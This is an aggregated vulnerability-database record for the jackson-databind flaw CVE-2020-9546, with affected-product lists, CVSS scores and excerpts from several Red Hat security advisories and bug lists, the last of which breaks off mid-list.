JBEAP-16114 - (7.3.z) Upgrade jboss-vfs to 3.2.15.Final JBEAP-18060 - GSS Upgrade weld from 3.1.2.Final-redhat-00001 to 3.1.4.Final-redhat-00001 JBEAP-18163 - (7.3.z) Upgrade HAL from 3.2.3.Final-redhat-00001 to 3.2.8.Final-redhat-00001 JBEAP-18221 - (7.3.z) Upgrade PicketLink bindings from 2.5.5.SP12-redhat-00010 to 2.5.5.SP12-redhat-00012 JBEAP-18240 - (7.3.z) Update the Chinese translations in WildFly Core JBEAP-18241 - (7.3.z) Update the Japanese translations in WildFly Core JBEAP-18273 - (7.3.z) Upgrade IronJacamar from 1.4.19.Final to 1.4.20.Final JBEAP-18277 - GSS Upgrade JBoss JSF API from 3.0.0.SP01-redhat-00001 to 3.0.0.SP02-redhat-00001 JBEAP-18288 - GSS Upgrade FasterXML from 2.10.0 to 2.10.3 JBEAP-18294 - (7.3.z) Upgrade JAXB from 2.3.1 to 2.3.3-b02 and com.sun.istack from 3.0.7 to 3.0.10 JBEAP-18302 - GSS Upgrade wildfly-http-client from 1.0.18 to 1.0.20 JBEAP-18315 - GSS Upgrade Artemis from 2.9.0.redhat-00005 to 2.9.0.redhat-00010 JBEAP-18346 - GSS Upgrade jakarta.el from 3.0.2.redhat-00001 to 3.0.3.redhat-00002 JBEAP-18352 - GSS Upgrade JBoss Remoting from 5.0.16.Final-redhat-00001 to 5.0.18.Final-redhat-00001 JBEAP-18361 - GSS Upgrade Woodstox from 5.0.3 to 6.0.3 JBEAP-18367 - GSS Upgrade Hibernate ORM from 5.3.15 to 5.3.16 JBEAP-18393 - GSS Update $JBOSS_HOME/docs/schema to show https schema URL instead of http JBEAP-18398 - Tracker bug for the EAP 7.3.1 release for RHEL-7 JBEAP-18409 - GSS Upgrade Infinispan from 9.4.16.Final-redhat-00002 to 9.4.18.Final-redhat-00001 JBEAP-18527 - (7.3.z) Upgrade WildFly Naming Client from 1.0.10.Final to 1.0.12.Final JBEAP-18528 - (7.3.z) Upgrade jboss-ejb-client from 4.0.27.Final to 4.0.31.Final-redhat-00001 JBEAP-18596 - GSS Upgrade JBoss Modules from 1.9.1 to 1.10.0 JBEAP-18598 - GSS Upgrade Bouncycastle from 1.60.0-redhat-00001 to 1.60.0-redhat-00002 JBEAP-18640 - [Runtimes] (7.3.x) Upgrade slf4j-jboss-logmanager from 1.0.3.GA.redhat-2 to 1.0.4.GA.redhat-00001 JBEAP-18653 - (7.3.z) Upgrade Apache CXF from 3.3.4.redhat-00001 to 3.3.5.redhat-00001 JBEAP-18706 - (7.3.z) Upgrade elytron-web from 1.6.0.Final to 1.6.1.Final JBEAP-18770 - Upgrade Jandex to 2.1.2.Final-redhat-00001 JBEAP-18775 - (7.3.z) Upgrade WildFly Core to 10.1.4.Final-redhat-00001 JBEAP-18788 - (7.3.x) Upgrade wss4j from 2.2.4.redhat-00001 to 2.2.5.redhat-00001 JBEAP-18790 - (7.3.z) Upgrade cryptacular from 1.2.0.redhat-1 to 1.2.4.redhat-00001 JBEAP-18818 - (7.3.z) Upgrade PicketBox from 5.0.3.Final-redhat-00005 to 5.0.3.Final-redhat-00006 JBEAP-18836 - GSS Upgrade Remoting JMX from 3.0.3 to 3.0.4 JBEAP-18850 - (7.3.z) Upgrade smallrye-config from 1.4.1 to 1.6.2 JBEAP-18870 - Upgrade WildFly Common to 1.5.2.Final.redhat-00002 JBEAP-18875 - Upgrade MicroProfile Metrics API to 2.3 and smallrye-metrics to 2.4.0 JBEAP-18876 - Upgrade Smallrye Health to 2.2.0 and MP Health API to 2.2 JBEAP-18877 - (7.3.z) Upgrade Jaeger client to 0.34.3 JBEAP-18878 - Upgrade Smallrye Opentracing to 1.3.4 and MP Opentracing to 1.3.3 JBEAP-18879 - (7.3.z) Upgrade MicroProfile Config 1.4 JBEAP-18929 - (7.3.z) Upgrade WildFly Elytron from 1.10.5.Final-redhat-00001 to 1.10.6.Final JBEAP-18990 - (7.3.z) Upgrade jasypt from 1.9.2 to 1.9.3-redhat-00001 JBEAP-18991 - (7.3.z) Upgrade opensaml from 3.3.0.redhat-1 to 3.3.1-redhat-00002 JBEAP-19035 - In Building Custom Layers, update pom.xml content for 7.3.1 JBEAP-19054 - Upgrade MP REST Client to 1.4.0.redhat-00004 JBEAP-19066 - Upgrade snakeyaml from 1.18.0.redhat-2 to 1.24.0.redhat-00001 JBEAP-19117 - GSS Upgrade org.jboss.genericjms from 2.0.2.Final-redhat-00001 to 2.0.4.Final-redhat-00001 JBEAP-19133 - GSS Upgrade JSF based on Mojarra 2.3.9.SP08-redhat-00001 to 2.3.9.SP09-redhat-00001 JBEAP-19156 - (7.3.z) Upgrade RESTEasy from 3.11.1.Final.redhat-00001 to 3.11.2.Final.redhat-00001 JBEAP-19181 - (7.3.z) Upgrade WildFly Core to 10.1.5.Final-redhat-00001 JBEAP-19192 - (7.3.z) Update the Japanese translations JBEAP-19232 - (7.3.z) Upgrade WildFly Core from 10.1.5.Final-redhat-00001 to 10.1.7.Final-redhat-00001 JBEAP-19281 - (7.3.z) Upgrade undertow from 2.0.30.SP2-redhat-00001 to 2.0.30.SP3-redhat-00001 JBEAP-19456 - Upgrade wildfly-transaction-client to 1.1.11.Final
- The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Security Fix(es):
-
netty (CVE-2016-4970 CVE-2020-7238 CVE-2019-20444 CVE-2019-20445)
-
dom4j (CVE-2018-1000632)
-
elasticsearch (CVE-2018-3831)
-
pdfbox (CVE-2018-11797)
-
vertx (CVE-2018-12541)
-
spring-data-jpa (CVE-2019-3797)
-
mina-core (CVE-2019-0231)
-
jackson-databind (CVE-2019-12086 CVE-2019-16335 CVE-2019-14540 CVE-2019-17267 CVE-2019-14892 CVE-2019-14893 CVE-2019-16942 CVE-2019-16943 CVE-2019-17531 CVE-2019-20330 CVE-2020-10673 CVE-2020-10672 CVE-2020-8840 CVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10968 CVE-2020-10969 CVE-2020-11111 CVE-2020-11112 CVE-2020-11113 CVE-2020-11620 CVE-2020-11619 CVE-2020-14195 CVE-2020-14060 CVE-2020-14061 CVE-2020-14062)
-
jackson-mapper-asl (CVE-2019-10172)
-
hawtio (CVE-2019-9827)
-
undertow (CVE-2019-9511 CVE-2020-1757 CVE-2019-14888 CVE-2020-1745)
-
santuario (CVE-2019-12400)
-
apache-commons-beanutils (CVE-2019-10086)
-
cxf (CVE-2019-17573)
-
apache-commons-configuration (CVE-2020-1953)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Installation instructions are available from the Fuse 7.7.0 product documentation page: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/
- Bugs fixed (https://bugzilla.redhat.com/):
1343616 - CVE-2016-4970 netty: Infinite loop vulnerability when handling renegotiation using SslProvider.OpenSsl 1620529 - CVE-2018-1000632 dom4j: XML Injection in Class: Element. Methods: addElement, addAttribute which can impact the integrity of XML documents 1632452 - CVE-2018-3831 elasticsearch: Information exposure via _cluster/settings API 1637492 - CVE-2018-11797 pdfbox: unbounded computation in parser resulting in a denial of service 1638391 - CVE-2018-12541 vertx: WebSocket HTTP upgrade implementation holds the entire http request in memory before the handshake 1697598 - CVE-2019-3797 spring-data-jpa: Additional information exposure with Spring Data JPA derived queries 1700016 - CVE-2019-0231 mina-core: Retaining an open socket in close_notify SSL-TLS leading to Information disclosure. 1713468 - CVE-2019-12086 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server. Description:
Red Hat Single Sign-On 7.4 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.
The References section of this erratum contains a download link (you must log in to download the update).
The JBoss server process must be restarted for the update to take effect
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.3"
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "gte",
"trust": 1.0,
"vendor": "netapp",
"version": "9.5"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "gte",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.7.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "jd edwards enterpriseone tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "communications evolved communications application server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.1"
},
{
"_id": null,
"model": "communications session route manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "retail sales audit",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0"
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "gte",
"trust": 1.0,
"vendor": "netapp",
"version": "7.3"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.0"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.0.15"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1"
},
{
"_id": null,
"model": "global lifecycle management opatch",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0.1.20"
},
{
"_id": null,
"model": "retail merchandising system",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.8.11.6"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "gte",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.8.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.1"
},
{
"_id": null,
"model": "banking platform",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.9.0"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.7.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.10.4"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "communications instant messaging server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.0.1.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.2"
},
{
"_id": null,
"model": "communications session report manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "jd edwards enterpriseone orchestrator",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.4.0.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "communications element manager",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "insurance policy administration j2ee",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.0.2.25"
},
{
"_id": null,
"model": "agile plm",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.3.6"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.2"
},
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.5.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.7.9.7"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.7"
},
{
"_id": null,
"model": "autovue for agile product lifecycle management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.0.2"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "financial services price creation and discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.0.1"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.0"
},
{
"_id": null,
"model": "retail service backbone",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "financial services retail customer analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "gte",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.0"
},
{
"_id": null,
"model": "communications calendar server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.4.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.3"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-9546"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "158048"
},
{
"db": "PACKETSTORM",
"id": "159083"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "158282"
},
{
"db": "PACKETSTORM",
"id": "159080"
},
{
"db": "PACKETSTORM",
"id": "158038"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-042"
}
],
"trust": 1.5
},
"cve": "CVE-2020-9546",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2020-9546",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-187671",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2020-9546",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-9546",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-042",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-187671",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-9546",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-187671"
},
{
"db": "VULMON",
"id": "CVE-2020-9546"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-042"
},
{
"db": "NVD",
"id": "CVE-2020-9546"
}
]
},
"description": {
"_id": null,
"data": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config). FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A security vulnerability exists in FasterXML jackson-databind 2.x versions prior to 2.9.10.4. An attacker could exploit this vulnerability with a specially crafted request to execute arbitrary code on the system. Description:\n\nRed Hat Decision Manager is an open source decision management platform\nthat combines business rules management, complex event processing, Decision\nModel \u0026 Notation (DMN) execution, and Business Optimizer for solving\nplanning problems. It automates business decisions and makes that logic\navailable to the entire business. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: Satellite 6.8 release\nAdvisory ID: RHSA-2020:4366-01\nProduct: Red Hat Satellite 6\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:4366\nIssue date: 2020-10-27\nCVE Names: CVE-2018-3258 CVE-2018-11751 CVE-2019-12781\n CVE-2019-16782 CVE-2020-5216 CVE-2020-5217\n CVE-2020-5267 CVE-2020-7238 CVE-2020-7663\n CVE-2020-7942 CVE-2020-7943 CVE-2020-8161\n CVE-2020-8184 CVE-2020-8840 CVE-2020-9546\n CVE-2020-9547 CVE-2020-9548 CVE-2020-10693\n CVE-2020-10968 CVE-2020-10969 CVE-2020-11619\n CVE-2020-14061 CVE-2020-14062 CVE-2020-14195\n CVE-2020-14334 CVE-2020-14380\n====================================================================\n1. Summary:\n\nAn update is now available for Red Hat Satellite 6.8 for RHEL 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Satellite 6.7 - noarch, x86_64\nRed Hat Satellite Capsule 6.8 - noarch, x86_64\n\n3. Description:\n\nRed Hat Satellite is a systems management tool for Linux-based\ninfrastructure. It allows for provisioning, remote management, and\nmonitoring of multiple Linux deployments with a single centralized tool. \n\nSecurity Fix(es):\n\n* mysql-connector-java: Connector/J unspecified vulnerability (CPU October\n2018) (CVE-2018-3258)\n* netty: HTTP Request Smuggling due to Transfer-Encoding whitespace\nmishandling (CVE-2020-7238)\n* rubygem-websocket-extensions: ReDoS vulnerability in\nSec-WebSocket-Extensions parser (CVE-2020-7663)\n* puppet: puppet server and puppetDB may leak sensitive information via\nmetrics API (CVE-2020-7943)\n* jackson-databind: multiple serialization gadgets (CVE-2020-8840\nCVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10968 CVE-2020-10969\nCVE-2020-11619 CVE-2020-14061 CVE-2020-14062 CVE-2020-14195)\n* foreman: unauthorized cache read on RPM-based installations through local\nuser (CVE-2020-14334)\n* Satellite: Local user impersonation by Single sign-on (SSO) user leads to\naccount takeover (CVE-2020-14380)\n* Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS\n(CVE-2019-12781)\n* rubygem-rack: hijack sessions by using timing attacks targeting the\nsession id (CVE-2019-16782)\n* rubygem-secure_headers: limited header injection when using dynamic\noverrides with user input (CVE-2020-5216)\n* rubygem-secure_headers: directive injection when using dynamic overrides\nwith user input (CVE-2020-5217)\n* rubygem-actionview: views that use the `j` or `escape_javascript` methods\nare susceptible to XSS attacks (CVE-2020-5267)\n* puppet: Arbitrary catalog retrieval (CVE-2020-7942)\n* rubygem-rack: directory traversal in Rack::Directory (CVE-2020-8161)\n* rubygem-rack: percent-encoded cookies can be used to overwrite existing\nprefixed cookie names (CVE-2020-8184)\n* hibernate-validator: Improper input validation in the interpolation of\nconstraint error messages (CVE-2020-10693)\n* puppet-agent: Puppet Agent does not properly verify SSL connection when\ndownloading a CRL (CVE-2018-11751)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\n* Provides the Satellite Ansible Modules that allow for full automation of\nyour Satellite configuration and deployment. \n\n* Adds ability to install Satellite and Capsules and manage hosts in a IPv6\nnetwork environment\n\n* Ansible based Capsule Upgrade automation: Ability to centrally upgrade\nall of your Capsule servers with a single job execution. \n\n* Platform upgrades to Postgres 12, Ansible 2.9, Ruby on Rails and latest\nversion of Puppet\n\n* Support for HTTP UEFI provisioning\n\n* Support for CAC card authentication with Keycloak integration\n\n* Add ability to upgrade Red Hat Enterprise Linux 7 hosts to version 8\nusing the LEAPP based tooling. \n\n* Support for Red Hat Enterprise Linux Traces integration\n\n* satellite-maintain \u0026 foreman-maintain are now self updating\n\n* Notifications in the UI to warn users when subscriptions are expiring. \n\nThe items above are not a complete list of changes. This update also fixes\nseveral bugs and adds various enhancements. Documentation for these changes\nis available from the Release Notes document linked to in the References\nsection. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1160344 - [RFE] Satellite support for cname as alternate cname for satellite server\n1261802 - [RFE] Make the foreman bootdisk full-host image work on UEFI systems\n1300211 - capsule-certs-generate failed to increment release number when generating certificate rpm for foreman-proxy\n1332702 - smart-proxy-openscap-send with additional features - alert if file corrupt\n1398317 - For the vms built by Satellite 6 using \"Network Based\" installation mode on VMWare, unable to change the boot sequence via BIOS\n1410616 - [RFE] Prominent notification of expiring subscriptions. \n1410916 - Should only be able to add repositories you have access to\n1429033 - Host provisioned with RHEL Workstation OS, after provisioning displayed as generic RedHat 7.3\n1461781 - [RFE]A button should be available in the GUI to clear the recurring logics. \n1469267 - need updated rubygem-rake\n1486446 - Content view versions list has slow query for package count\n1486696 - \u0027hammer host update\u0027 removes existing host parameters\n1494180 - Sorting by network address for subnet doesn\u0027t work properly\n1501499 - tomcat listens to 0.0.0.0 for serving requests but just needs localhost\n1503037 - [RFE] Cancelled future/recurring job invocations should not get the status \"failed\" but rather \"cancelled\"\n1505842 - Remote Execution engine: Error initializing command: Net::SSH::HostKeyMismatch - fingerprint 20:a9:b7:45:1a:b7:d6:42:1e:03:d1:1f:06:20:4c:e2 does not match for \"172.17.0.101\"\n1531674 - Operating System Templates are ordered inconsistently in UI. \n1537320 - [RFE] Support for Capsules at 1 version lower than Satellite\n1543316 - Satellite 6.2 Upgrade Fails with error \"rake aborted! NoMethodError: undefined method `first\u0027 for nil:NilClass\" when there are custom bookmarks created\n1563270 - Sync status information is lost after cleaning up old tasks related to sync. \n1569324 - Webrick is unable to use 2 supported TLS v1.2 ciphers (\u0027ECDHE-RSA-AES128-GCM-SHA256\u0027, \u0027ECDHE-RSA-AES256-GCM-SHA384\u0027)\n1571907 - Passenger threads throwing tracebacks on API jobs after spawning\n1576859 - [RFE] Implement automatic assigning subnets through data provided by facter\n1584184 - [RFE] The locked template is getting overridden by default\n1601101 - [RFE] Add autofill functionality to the Job invocation Search query box, copy from Hosts search box\n1607706 - [RFE] Add support for --vlanid in Satellite Kickstart Default provisioning template\n1608001 - Rearrange search/filter options on Red Hat Repositories page. \n1613391 - race condition on removing multiple organizations simultaneously\n1619274 - [RFE] Red Hat Satellite should now be able to discover and provision bare metal machines via UEFI HTTP boot\n1619422 - User Agent for Downstream RSS feed still says Foreman and Foreman Version\n1620214 - Page should auto-refresh after subscriptions have been modified on the Satellite webui\n1624049 - Changing the organization in the Satellite WebUI does not change the sync plan page information from the previous organization\n1625258 - Having empty \"Allocation (GB)\" when creating a new Host, nil:NilClass returned on creating the Host\n1627066 - Unable to revert to the original version of the provisioning template\n1630433 - [RFE] Include Ansible Satellite modules with Ansible Core modules\n1630536 - yum repos password stored as cleartext\n1632577 - Audit log show \u0027missing\u0027 for adding/removing repository to a CV\n1640615 - CVE-2018-3258 mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018)\n1645062 - host_collection controller responds with 200 instead of 201 to a POST request\n1645749 - repositories controller responds with 200 instead of 201 to a POST request\n1647216 - Lack of edit_smart_proxies permission causes error when setting host to Build\n1647364 - [RFE] Extend the audits by the http request id\n1647781 - Audits contain no data (Added foo to Missing(ID: x))\n1651297 - Very slow query when using facts on user roles as filters\n1653217 - [RFE] More evocative name for Play Ansible Roles option?\n1654347 - Satellite may create duplicate CreateRssNotifications tasks after restarting foreman tasks\n1654375 - [RFE] Mention specifically uder the admin chexbox for AD LDAP user if its created with admin role,\n1659418 - katello-tracer-upload failing with error \"ImportError: No module named katello\"\n1665277 - subscription manager register activation key with special character failed\n1665893 - candlepin refuses to start or hangs periodically when having too many messages in ActiveMQ journal\n1666693 - Command \"hammer subscription list\" is not correctly showing the comment \"Guests of \" in the \"Type\" field in the output. \n1677907 - Ansible API endpoints return 404\n1680157 - [RFE] Puppet \u0027package\u0027 provider type does not support selecting modularity streams\n1680458 - Locked Report Templates are getting removed. \n1680567 - Reporting Engine API to list report template per organization/location returns 404 error\n1681619 - [RFE] Disable the option to enter a MAC address after selecting a compute resource while creating new hosts through Satellite\n1685949 - [RFE] Support passing of attribute name instead of Id\u0027s in RHV workflow\n1687116 - kernel version checks should not use /lib/modules to determine running version\n1688886 - subscription-manager not attaching the right quantity per the cpu core\n1691416 - Delays when many clients upload tracer data simultaneously\n1697476 - [RFE] To be able to see the name of the provisioning template being used to build a host from the host itself\n1702434 - foreman-bootloaders-redhat-tftpboot expected file permissions in package don\u0027t match runtime permissions\n1705097 - An empty report file doesn\u0027t show any headers\n1709557 - [RFE] warn the user if they have done a select all and it includes the restart|reboot service\n1709842 - Tracer shows the machines needs rebooting even after reboot if kernel-debug is installed\n1710511 - Filter by os_minor includes unexpected values on the Satellite web UI. \n1715999 - Use Infoblox API for DNS conflict check and not system resolver\n1716423 - Nonexistent quota can be set\n1717403 - Broken breadcrumbs link to compute resource VM list on VM detail page\n1718012 - [RFE] Add a hard limit of 100 items to restrict any fact child-hash/array\n1718954 - 